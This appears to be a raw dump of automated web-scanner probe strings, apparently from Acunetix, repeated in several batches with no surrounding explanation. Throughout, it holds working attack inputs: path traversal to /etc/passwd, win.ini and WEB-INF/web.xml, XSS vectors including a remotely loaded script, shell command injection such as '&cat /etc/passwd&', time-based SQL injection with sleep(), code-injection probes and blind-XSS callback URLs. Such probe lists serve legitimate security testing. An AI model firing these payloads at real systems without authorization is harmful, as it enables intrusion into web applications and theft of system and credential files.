WEB-INF\web.xml

1

1_910123

1

1

"|dir

1

../../../../../../../../../../windows/win.ini

1

1

1

1

acu7316<s1﹥s2ʺs3ʹuca7316

../../../../../../../../../../boot.ini

1

1

1

acux8604z1z2abcxuca8604

1

../../../../../../../../../../windows/win.ini.jpg

1

1

windowswin.ini

1<ScRiPt >prompt(920772)</ScRiPt>

1

1

1

................windowswin.ini

1<script>prompt(937000)</script>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(992432)</ScRiPt>

1

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?938526></ScRiPt>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(967932)</ScRiPt>

1

1

1

response.write(9760533*9460239)

1<video><source onerror="javascript:prompt(974329)">

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

'+response.write(9760533*9460239)+'

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(980955)"></g></svg>

1

1

"+response.write(9760533*9460239)+"

1

&cat /etc/passwd&

1<div style=width:expression(prompt(983143))>

WEB-INF/web.xml

1

1

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1<iframe src='data:text/html

'&cat /etc/passwd&'

WEB-INF\web.xml

1

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<body onload=prompt(928325)>

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

../../../../../../../../../../etc/passwd.jpg

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(985355)>

SomeCustomInjectedHeader:injected_by_wvs

${99922+99687}

cat /etc/passwd

1

1&n903706=v982228

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

-1

1<img src=xyz OnErRor=prompt(992217)>

1

1

1

`cat /etc/passwd`

1

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

-1)

1<img/src=">" onerror=alert(991709)>

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

)

1

|cat /etc/passwd#

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

-1))

1<ScRiPt%20>prompt(964373)</sCripT>

!(()&&!|*|*|

.\./.\./.\./.\./.\./.\./etc/passwd

1

1

'|'ld

'"()

testasp.vulnweb.com

1

1xCWIy3J'

1&lt

/etc/passwd

^(#$!@#$)(()))******

1

"|"ld

1

1

1

rkYtgOYr')

<img acu onmouseover=prompt(960013) //>

1

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

1<input autofocus onfocus=prompt(976627)>

RMyWyPBk'))

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

'

1

<a href='http://www.acunetix.com'>website security</a>

-1

1

1

1

1

${@print(md5(acunetix_wvs_security_test))}

................etc/passwd

"

acunetix_wvs_invalid_filename

-1)

[url=http://www.acunetix.com]website security[/url]

http://hitzNC53MH7H6.bxss.me/

1

1

${@print(md5(acunetix_wvs_security_test))}\

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

||cat /etc/passwd

-1))

1_pPoU9 <ScRiPt >prompt(955724)</ScRiPt>

1

1

1

1

1

&dir

comments

file:///etc/passwd

1

GFlDIhRE'

1

comments/.

http://www.acunetix.tst

1

'"

1'"()&%<ScRiPt >prompt(949484)</ScRiPt>

'&dir&'

/\../\../\../\../\../\../\../etc/passwd

NHFft8JZ')

1

1

1

1

1

"&dir&"

<!--

'"()&%<ScRiPt >prompt(935793)</ScRiPt>

WEB-INF/web.xml

p3DabuFb'))

1

1

1

1

1_997934

1

|dir

WEB-INF\web.xml

1

1

1

1

1

acu8236<s1﹥s2ʺs3ʹuca8236

'|dir

../../../../../../../../../../windows/win.ini

1

1

1

"|dir

acux8417z1z2abcxuca8417

../../../../../../../../../../boot.ini

1

1

1

1<ScRiPt >prompt(981585)</ScRiPt>

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<script>prompt(941365)</script>

1

1

1

windowswin.ini

1<ScRiPt >prompt(964868)</ScRiPt>

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?952444></ScRiPt>

1

1

................windowswin.ini

1

1<ScRiPt >prompt(994938)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<video><source onerror="javascript:prompt(920990)">

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<video><source onerror="javascript:prompt(920990)">

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<video><source onerror="javascript:prompt(920990)">

1

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<video><source onerror="javascript:prompt(920990)">

1

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(977278)"></g></svg>

1

1

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(977278)"></g></svg>

1

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(977278)"></g></svg>

1

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(977278)"></g></svg>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<div style=width:expression(prompt(944023))>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<div style=width:expression(prompt(944023))>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<div style=width:expression(prompt(944023))>

1

1

1

1

1<iframe src='data:text/html

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

response.write(9510160*9182080)

1

1<body onload=prompt(929951)>

1

1

'+response.write(9510160*9182080)+'

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(952141)>

1

&cat /etc/passwd&

1

1

WEB-INF/web.xml

"+response.write(9510160*9182080)+"

1<img src=xyz OnErRor=prompt(982053)>

if(now()=sysdate(),sleep(10.218),0)/*'XOR(if(now()=sysdate(),sleep(10.218),0))OR'"XOR(if(now()=sysdate(),sleep(10.218),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

WEB-INF\web.xml

1

1

1

1<img/src=">" onerror=alert(996416)>

SomeCustomInjectedHeader:injected_by_wvs

(select(0)from(select(sleep(10.218)))v)/*'+(select(0)from(select(sleep(10.218)))v)+'"+(select(0)from(select(sleep(10.218)))v)+"*/

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

1<ScRiPt%20>prompt(920926)</sCripT>

1

1

SomeCustomInjectedHeader:injected_by_wvs

-1

1

cat /etc/passwd

1

${100037+100466}

../../../../../../../../../../etc/passwd.jpg

1

1&lt

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1)

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1&n920726=v987766

`cat /etc/passwd`

1

1some_inexistent_file_with_long_name%00.jpg

1

<img acu onmouseover=prompt(900585) //>

1

-1))

)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

|cat /etc/passwd#

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1<input autofocus onfocus=prompt(918510)>

1

T8up8q0K'

!(()&&!|*|*|

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

testasp.vulnweb.com

'|'ld

1

<a href='http://www.acunetix.com'>website security</a>

rWkhnn2P')

^(#$!@#$)(()))******

'"()

1

.\./.\./.\./.\./.\./.\./etc/passwd

1

"|"ld

1

[url=http://www.acunetix.com]website security[/url]

'

qNn3mPuS'))

1

1

1

1

/etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1_LgRFK <ScRiPt >prompt(930755)</ScRiPt>

"

1

1

-1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

'

1

1

${@print(md5(acunetix_wvs_security_test))}

1

-1)

1

1

http://hitTVPIzq1ZWQ.bxss.me/

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

1

${@print(md5(acunetix_wvs_security_test))}\

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1))

acunetix_wvs_invalid_filename

1

1

1

................etc/passwd

1

||cat /etc/passwd

3TguSrHz'

1

1

http://www.acunetix.tst

comments

1

'"

1

PK31V48s')

&dir

1'"()&%<ScRiPt >prompt(954907)</ScRiPt>

1

comments

1

6GTuOAWc'))

<!--

1

file:///etc/passwd

'"()&%<ScRiPt >prompt(937416)</ScRiPt>

'&dir&'

1

comments/.

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1_995600

1

1

1

"&dir&"

WEB-INF/web.xml

1

1

1

WEB-INF\web.xml

|dir

acu3809<s1﹥s2ʺs3ʹuca3809

1

1

1

../../../../../../../../../../windows/win.ini

'|dir

acux3618z1z2abcxuca3618

1

1

../../../../../../../../../../boot.ini

1

"|dir

1<ScRiPt >prompt(978552)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1<script>prompt(952210)</script>

1

1

1

1

1<ScRiPt >prompt(993986)</ScRiPt>

windowswin.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?920710></ScRiPt>

1

................windowswin.ini

1

1

1<ScRiPt >prompt(960839)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<video><source onerror="javascript:prompt(958389)">

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(927591)"></g></svg>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<div style=width:expression(prompt(936768))>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<iframe src='data:text/html

response.write(9509583*9314062)

1

1

1

'+response.write(9509583*9314062)+'

1<body onload=prompt(949728)>

&cat /etc/passwd&

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF/web.xml

../../../../../../../../../../etc/passwd

"+response.write(9509583*9314062)+"

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(996554)>

'&cat /etc/passwd&'

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

WEB-INF\web.xml

1

1<img src=xyz OnErRor=prompt(994381)>

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd.jpg

1

1<img/src=">" onerror=alert(951538)>

1

cat /etc/passwd

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1<ScRiPt%20>prompt(934916)</sCripT>

1

`cat /etc/passwd`

-1

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

${99345+100158}

1

1&lt

-1)

|cat /etc/passwd#

1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

<img acu onmouseover=prompt(943946) //>

1

1some_inexistent_file_with_long_name%00.jpg

-1))

'|'ld

1&n995268=v964433

)

1

1

.\./.\./.\./.\./.\./.\./etc/passwd

1<input autofocus onfocus=prompt(919661)>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

ad6hT5mx'

1

"|"ld

!(()&&!|*|*|

1

<a href='http://www.acunetix.com'>website security</a>

'"()

1

/etc/passwd

testasp.vulnweb.com

8KS04GeB')

^(#$!@#$)(()))******

1

1

[url=http://www.acunetix.com]website security[/url]

1

1

81YvZwq4'))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

'

1_xh8JH <ScRiPt >prompt(927231)</ScRiPt>

1

'

1

1

1

-1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

"

1

-1)

................etc/passwd

1

1

1

${@print(md5(acunetix_wvs_security_test))}

||cat /etc/passwd

1

1

acunetix_wvs_invalid_filename

-1))

1

1

http://hit8pORhziHjl.bxss.me/

${@print(md5(acunetix_wvs_security_test))}\

&dir

1

t0WbjNQT'

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

1

1

file:///etc/passwd

1

1

'&dir&'

7JkKBRu0')

comments

1

1

1

'"

/\../\../\../\../\../\../\../etc/passwd

1

s5A6JHEI'))

1'"()&%<ScRiPt >prompt(978445)</ScRiPt>

"&dir&"

comments/.

1

WEB-INF/web.xml

<!--

1

1

|dir

1

'"()&%<ScRiPt >prompt(993790)</ScRiPt>

1

1

WEB-INF\web.xml

1

1

1

'|dir

1_952155

1

1

../../../../../../../../../../windows/win.ini

"|dir

1

1

acu10250<s1﹥s2ʺs3ʹuca10250

1

1

../../../../../../../../../../boot.ini

1

1

1

1

acux8247z1z2abcxuca8247

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(970213)</ScRiPt>

1

windowswin.ini

1

................windowswin.ini

1<script>prompt(902955)</script>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(948577)</ScRiPt>

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?983154></ScRiPt>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(920193)</ScRiPt>

1

1

1

1<video><source onerror="javascript:prompt(955716)">

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(928372)"></g></svg>

1

1

WEB-INF/web.xml

1

1

response.write(9237470*9841365)

1

1<div style=width:expression(prompt(922702))>

WEB-INF\web.xml

1

'+response.write(9237470*9841365)+'

1

1

1<iframe src='data:text/html

"+response.write(9237470*9841365)+"

&cat /etc/passwd&

1

1

1

1<body onload=prompt(946032)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

'&cat /etc/passwd&'

../../../../../../../../../../etc/passwd

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(954697)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1<img src=xyz OnErRor=prompt(946911)>

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

cat /etc/passwd

-1

../../../../../../../../../../etc/passwd.jpg

1

1<img/src=">" onerror=alert(908614)>

1

1

1

${100448+99578}

`cat /etc/passwd`

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1)

1

1<ScRiPt%20>prompt(920184)</sCripT>

1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

1

1&lt

1&n965883=v914460

1

1

)

1some_inexistent_file_with_long_name%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

'|'ld

1ScdM5Er'

<img acu onmouseover=prompt(928832) //>

1

1

1

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

zx5fMOeW')

.\./.\./.\./.\./.\./.\./etc/passwd

1<input autofocus onfocus=prompt(999148)>

1

'"()

1

^(#$!@#$)(()))******

testasp.vulnweb.com

http://testasp.vulnweb.com/t/xss.html?%00.jpg

<a href='http://www.acunetix.com'>website security</a>

VzS41Byp'))

'

/etc/passwd

1

1

1

[url=http://www.acunetix.com]website security[/url]

1

'

1

-1

1

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1_tg1rU <ScRiPt >prompt(934228)</ScRiPt>

"

1

1

-1)

${@print(md5(acunetix_wvs_security_test))}

http://hitEEhDgOaLUk.bxss.me/

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

||cat /etc/passwd

acunetix_wvs_invalid_filename

-1))

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

................etc/passwd

1

1

1

&dir

comments

3Dv5uYMw'

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

'"

http://www.acunetix.tst

'&dir&'

comments

1

fYqmYkyE')

1

1

file:///etc/passwd

1'"()&%<ScRiPt >prompt(943569)</ScRiPt>

<!--

1

"&dir&"

comments/.

gguLV0T4'))

1

/\../\../\../\../\../\../\../etc/passwd

1

'"()&%<ScRiPt >prompt(918002)</ScRiPt>

1

1

|dir

1

WEB-INF/web.xml

1

1

1

1_952505

1

1

'|dir

1

1

WEB-INF\web.xml

acu3520<s1﹥s2ʺs3ʹuca3520

1

1

"|dir

1

../../../../../../../../../../windows/win.ini

1

1

acux2742z1z2abcxuca2742

1

1<ScRiPt >prompt(985517)</ScRiPt>

1

1

../../../../../../../../../../boot.ini

1

../../../../../../../../../../windows/win.ini.jpg

1<script>prompt(935676)</script>

1

1

1

windowswin.ini

1

1<ScRiPt >prompt(954553)</ScRiPt>

1

1

1

................windowswin.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?910405></ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(952300)</ScRiPt>

1

1

1

1<video><source onerror="javascript:prompt(921388)">

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(946966)"></g></svg>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<div style=width:expression(prompt(975314))>

1

1

1

response.write(9979166*9841640)

1<iframe src='data:text/html

WEB-INF/web.xml

1

'+response.write(9979166*9841640)+'

1

1

1<body onload=prompt(964887)>

&cat /etc/passwd&

WEB-INF\web.xml

1

"+response.write(9979166*9841640)+"

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(979094)>

'&cat /etc/passwd&'

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=xyz OnErRor=prompt(953943)>

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

"&cat /etc/passwd&"

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd.jpg

1

1<img/src=">" onerror=alert(994773)>

-1

1

cat /etc/passwd

1

1

1

-1)

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

${100196+100183}

1<ScRiPt%20>prompt(951871)</sCripT>

`cat /etc/passwd`

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

-1))

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1&n956108=v913077

1

1&lt

|cat /etc/passwd#

1some_inexistent_file_with_long_name%00.jpg

Kl392An2'

1

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

)

<img acu onmouseover=prompt(986632) //>

'|'ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

d6CFRkZS')

.\./.\./.\./.\./.\./.\./etc/passwd

1

1

1<input autofocus onfocus=prompt(926701)>

"|"ld

testasp.vulnweb.com

pval8BxJ'))

^(#$!@#$)(()))******

'"()

'

/etc/passwd

1

<a href='http://www.acunetix.com'>website security</a>

1

1

1

-1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

"

1

[url=http://www.acunetix.com]website security[/url]

'

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

${@print(md5(acunetix_wvs_security_test))}

-1)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1_56xRs <ScRiPt >prompt(927043)</ScRiPt>

"

1

1

-1))

1

1

${@print(md5(acunetix_wvs_security_test))}\

................etc/passwd

1

1

1

||cat /etc/passwd

1

eDDwzEtw'

http://hitRHI8ch7iwR.bxss.me/

1

1

acunetix_wvs_invalid_filename

1

&dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

lQkopECP')

1

1

1

'&dir&'

comments

1

file:///etc/passwd

1

KWRrzsND'))

1

http://www.acunetix.tst

1

"&dir&"

comments

'"

/\../\../\../\../\../\../\../etc/passwd

1'"()&%<ScRiPt >prompt(920990)</ScRiPt>

1

1

1

1

|dir

<!--

comments/.

1

1

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(996327)</ScRiPt>

'|dir

1

1

1

1

1_983874

WEB-INF\web.xml

1

"|dir

1

1

1

1

1

../../../../../../../../../../windows/win.ini

acu8627<s1﹥s2ʺs3ʹuca8627

1

1

1

1

../../../../../../../../../../boot.ini

acux4922z1z2abcxuca4922

1

1

1

1

1<ScRiPt >prompt(988641)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1

1<script>prompt(997146)</script>

1

1

windowswin.ini

1

1<ScRiPt >prompt(927142)</ScRiPt>

1

1

................windowswin.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?987630></ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(963888)</ScRiPt>

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1<video><source onerror="javascript:prompt(943037)">

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(921936)"></g></svg>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

response.write(9646801*9049080)

1<div style=width:expression(prompt(938921))>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

&cat /etc/passwd&

1<iframe src='data:text/html

1

'+response.write(9646801*9049080)+'

1

'&cat /etc/passwd&'

1

1<body onload=prompt(929185)>

"+response.write(9646801*9049080)+"

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(931030)>

../../../../../../../../../../etc/passwd

1

"&cat /etc/passwd&"

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

1<img src=xyz OnErRor=prompt(969909)>

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

cat /etc/passwd

1

-1

1

SomeCustomInjectedHeader:injected_by_wvs

1<img/src=">" onerror=alert(983767)>

1

1

../../../../../../../../../../etc/passwd.jpg

1

`cat /etc/passwd`

-1)

1

1

1

1<ScRiPt%20>prompt(994300)</sCripT>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

${99022+99504}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

|cat /etc/passwd#

-1))

1

1&lt

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n981299=v904334

1

1some_inexistent_file_with_long_name%00.jpg

YVtgS6d6'

1

'|'ld

1

<img acu onmouseover=prompt(968486) //>

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

7UahA1da')

"|"ld

1<input autofocus onfocus=prompt(985477)>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

.\./.\./.\./.\./.\./.\./etc/passwd

!(()&&!|*|*|

testasp.vulnweb.com

'

1

3kZER72h'))

<a href='http://www.acunetix.com'>website security</a>

'"()

1

/etc/passwd

^(#$!@#$)(()))******

1

1

"

1

-1

[url=http://www.acunetix.com]website security[/url]

1

'

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}

-1)

1

1_9fvD6 <ScRiPt >prompt(995987)</ScRiPt>

"

1

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

comments

${@print(md5(acunetix_wvs_security_test))}\

-1))

1

http://hitND94PjHQtU.bxss.me/

||cat /etc/passwd

1

1

1

1

................etc/passwd

cEr0my9a'

1

comments

1

&dir

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

USiXpyEM')

1

comments/.

1

1

http://www.acunetix.tst

0KdXdeSN'))

'&dir&'

1

1

file:///etc/passwd

'"

1

1'"()&%<ScRiPt >prompt(952022)</ScRiPt>

1

1

1

"&dir&"

1

/\../\../\../\../\../\../\../etc/passwd

<!--

1

1

'"()&%<ScRiPt >prompt(907553)</ScRiPt>

|dir

WEB-INF/web.xml

1

1

1

1

1

1_956781

WEB-INF\web.xml

'|dir

1

1

1

../../../../../../../../../../windows/win.ini

1

"|dir

1

1

../../../../../../../../../../boot.ini

acu9807<s1﹥s2ʺs3ʹuca9807

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acux7792z1z2abcxuca7792

1

1

windowswin.ini

1

1

1<ScRiPt >prompt(995772)</ScRiPt>

1

................windowswin.ini

1

1

1<script>prompt(988956)</script>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(973766)</ScRiPt>

1

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?998352></ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(998586)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<video><source onerror="javascript:prompt(947286)">

1

response.write(9211963*9059230)

1

1

1

&cat /etc/passwd&

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(999052)"></g></svg>

'+response.write(9211963*9059230)+'

WEB-INF/web.xml

1

1

1

'&cat /etc/passwd&'

1<div style=width:expression(prompt(962078))>

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

WEB-INF\web.xml

"+response.write(9211963*9059230)+"

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1<iframe src='data:text/html

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

../../../../../../../../../../etc/passwd.jpg

1<body onload=prompt(960826)>

1

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1

-1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(917317)>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

`cat /etc/passwd`

1

1

-1)

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1<img src=xyz OnErRor=prompt(998012)>

